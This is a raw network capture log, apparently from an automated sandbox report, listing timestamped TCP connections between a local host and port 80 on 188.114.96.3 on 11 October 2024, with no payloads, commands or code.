                                                                Oct 11, 2024 01:37:41.921293974 CEST8050098188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.921415091 CEST5009880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.921542883 CEST5009880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.927283049 CEST8050098188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.967427015 CEST5009980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.972385883 CEST8050099188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.977328062 CEST5009980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.977433920 CEST5009980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.982230902 CEST8050099188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.268851995 CEST5009880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.273897886 CEST8050098188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.273977995 CEST8050098188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.331923008 CEST5009980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.336766958 CEST8050099188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.336798906 CEST8050099188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.336812019 CEST8050099188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.368360043 CEST8050098188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.409327030 CEST5009880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.421405077 CEST8050099188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.471818924 CEST5009980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.589339018 CEST8050099188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.623291969 CEST8050098188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.643713951 CEST5009980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.674952030 CEST5009880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.745609999 CEST5009880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.748603106 CEST5009980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.750823975 CEST8050098188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.750902891 CEST5009880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.754184961 CEST8050099188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.755202055 CEST5009980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.755441904 CEST5010080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.760270119 CEST8050100188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.761622906 CEST5010080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.761743069 CEST5010080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.766976118 CEST8050100188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.821187973 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.826976061 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:42.827150106 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.827410936 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:42.832587004 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.112576008 CEST5010080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.117822886 CEST8050100188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.117990971 CEST8050100188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.175085068 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.180901051 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.180953026 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.180982113 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.228523016 CEST8050100188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.268687010 CEST5010080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.291824102 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.346930981 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.486478090 CEST8050100188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.534334898 CEST5010080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.537017107 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.581301928 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.597623110 CEST5010080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.597841978 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.603076935 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.603512049 CEST8050100188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.603564978 CEST5010080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.656546116 CEST5010280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.662005901 CEST8050102188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.662159920 CEST5010280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.662250996 CEST5010280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.667474031 CEST8050102188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.696655035 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.696820021 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:43.702406883 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:43.702447891 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.002238035 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.018964052 CEST5010280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.024986029 CEST8050102188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.025027990 CEST8050102188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.025054932 CEST8050102188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.050136089 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.105544090 CEST8050102188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.113053083 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.118216038 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.159461975 CEST5010280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.211055040 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.211225033 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.216196060 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.216300964 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.282013893 CEST8050102188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.331332922 CEST5010280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.368356943 CEST8050102188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.409430027 CEST5010280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.486629963 CEST5010280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.488121033 CEST5010380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.492748022 CEST8050102188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.492889881 CEST5010280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.493094921 CEST8050103188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.493186951 CEST5010380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.493326902 CEST5010380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.498425007 CEST8050103188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.509605885 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.565670967 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.628747940 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.633919001 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.727343082 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.727581978 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.846905947 CEST5010380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.967780113 CEST8050103188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.967866898 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.967942953 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:44.967956066 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.969074965 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.969161987 CEST8050103188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.969417095 CEST8050103188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:44.969558001 CEST8050103188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:45.018692017 CEST5010380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:45.260570049 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:45.315721989 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:45.334655046 CEST8050103188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:45.378056049 CEST5010380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:45.379067898 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:45.384171963 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:45.564769030 CEST5010380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:45.565486908 CEST5010480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:45.681174040 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:45.683974028 CEST8050104188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:45.684103012 CEST5010480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:45.684165001 CEST8050103188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:45.684232950 CEST5010380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:45.705271006 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:45.705435038 CEST5010480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:45.710258007 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:45.710592031 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:45.710621119 CEST8050104188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:45.966842890 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.018707037 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.050250053 CEST5010480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.055831909 CEST8050104188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.055883884 CEST8050104188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.055913925 CEST8050104188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.081938982 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.082690001 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.088011980 CEST8050101188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.088057995 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.088171005 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.088177919 CEST5010180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.088238955 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.093808889 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.126727104 CEST8050104188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.175013065 CEST5010480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.310863018 CEST8050104188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.362416983 CEST5010480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.441391945 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.442152023 CEST5010480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.443015099 CEST5010680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.446502924 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.446700096 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.447551966 CEST8050104188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.447921991 CEST8050106188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.447961092 CEST5010480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.447988987 CEST5010680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.448084116 CEST5010680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.452946901 CEST8050106188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.535514116 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.581170082 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.703624964 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.706984997 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.712384939 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.800029993 CEST5010680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.801528931 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.801675081 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:46.805432081 CEST8050106188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.805469990 CEST8050106188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.805496931 CEST8050106188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.807300091 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.904385090 CEST8050106188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:46.956152916 CEST5010680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.051328897 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.057893991 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.063508987 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.293016911 CEST8050106188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.293046951 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.293227911 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.294143915 CEST8050106188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.295247078 CEST5010680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.298218012 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.298521996 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.408612967 CEST5010680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.410079002 CEST5010780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.414324045 CEST8050106188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.415174007 CEST8050107188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.415225029 CEST5010680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.415250063 CEST5010780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.415894032 CEST5010780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.420908928 CEST8050107188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.589040041 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.589309931 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.594605923 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.683212042 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.683417082 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.688563108 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.688594103 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.688606977 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.769391060 CEST5010780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.774524927 CEST8050107188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.774540901 CEST8050107188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.774553061 CEST8050107188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.890824080 CEST8050107188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.940499067 CEST5010780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.946580887 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:47.947777033 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:47.952752113 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.042040110 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.042277098 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.047324896 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.047341108 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.063666105 CEST8050107188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.112374067 CEST5010780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.261957884 CEST5010780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.266019106 CEST5010880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.267782927 CEST8050107188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.267863989 CEST5010780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.271161079 CEST8050108188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.271362066 CEST5010880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.273099899 CEST5010880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.278172016 CEST8050108188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.340665102 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.401520967 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.558330059 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.563795090 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.629326105 CEST5010880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.634746075 CEST8050108188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.634784937 CEST8050108188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.634815931 CEST8050108188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.667035103 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.667253017 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.672173023 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.672270060 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.735490084 CEST8050108188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.785300970 CEST5010880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:48.962912083 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:48.993127108 CEST8050108188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:49.018610954 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.053308010 CEST5010880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.066411972 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.066447020 CEST5010880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.069195986 CEST5010980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.072302103 CEST8050105188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:49.072393894 CEST8050108188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:49.072571039 CEST5010880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.072679996 CEST5010580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.074395895 CEST8050109188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:49.074484110 CEST5010980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.074600935 CEST5010980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.079581022 CEST8050109188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:49.108304977 CEST5010980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.108968973 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.116120100 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:49.116386890 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.116533995 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.121438980 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:49.157809019 CEST8050109188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:49.225291967 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.230557919 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:49.230787992 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.231300116 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.236603975 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:49.472450972 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.581716061 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.784328938 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:49.893738031 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.366485119 CEST8050109188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.366549969 CEST5010980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.367223024 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.367244005 CEST8050109188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.367257118 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.367309093 CEST5010980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.367512941 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.367556095 CEST8050109188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.367563963 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.367568970 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.367585897 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.367604017 CEST5010980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.367621899 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.367760897 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.367810965 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.367866039 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.368020058 CEST8050109188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.368061066 CEST5010980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.369694948 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.369752884 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.369965076 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.370748043 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.370760918 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.370919943 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.370923042 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.371258020 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.371532917 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.373087883 CEST8050109188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.373101950 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.373112917 CEST8050109188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.373125076 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.373137951 CEST8050109188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.374954939 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.374968052 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.375811100 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.622759104 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.675265074 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.739495039 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.740288019 CEST5011280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.742253065 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.747483969 CEST8050111188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.747821093 CEST5011180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.748076916 CEST8050112188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.748280048 CEST5011280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.748368025 CEST5011280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.756105900 CEST8050112188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.784554005 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.885987043 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.886836052 CEST5011380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.892604113 CEST8050110188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.892689943 CEST5011080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.892963886 CEST8050113188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:50.893054008 CEST5011380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.893213034 CEST5011380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:50.898667097 CEST8050113188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:51.099569082 CEST5011280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:51.104703903 CEST8050112188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:51.104723930 CEST8050112188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:51.221674919 CEST8050112188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:51.249819040 CEST5011380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:51.255189896 CEST8050113188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:51.255209923 CEST8050113188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:51.255223036 CEST8050113188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:51.271529913 CEST5011280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:51.341695070 CEST8050113188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:51.390083075 CEST8050112188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:51.393574953 CEST5011380192.168.2.5188.114.96.3
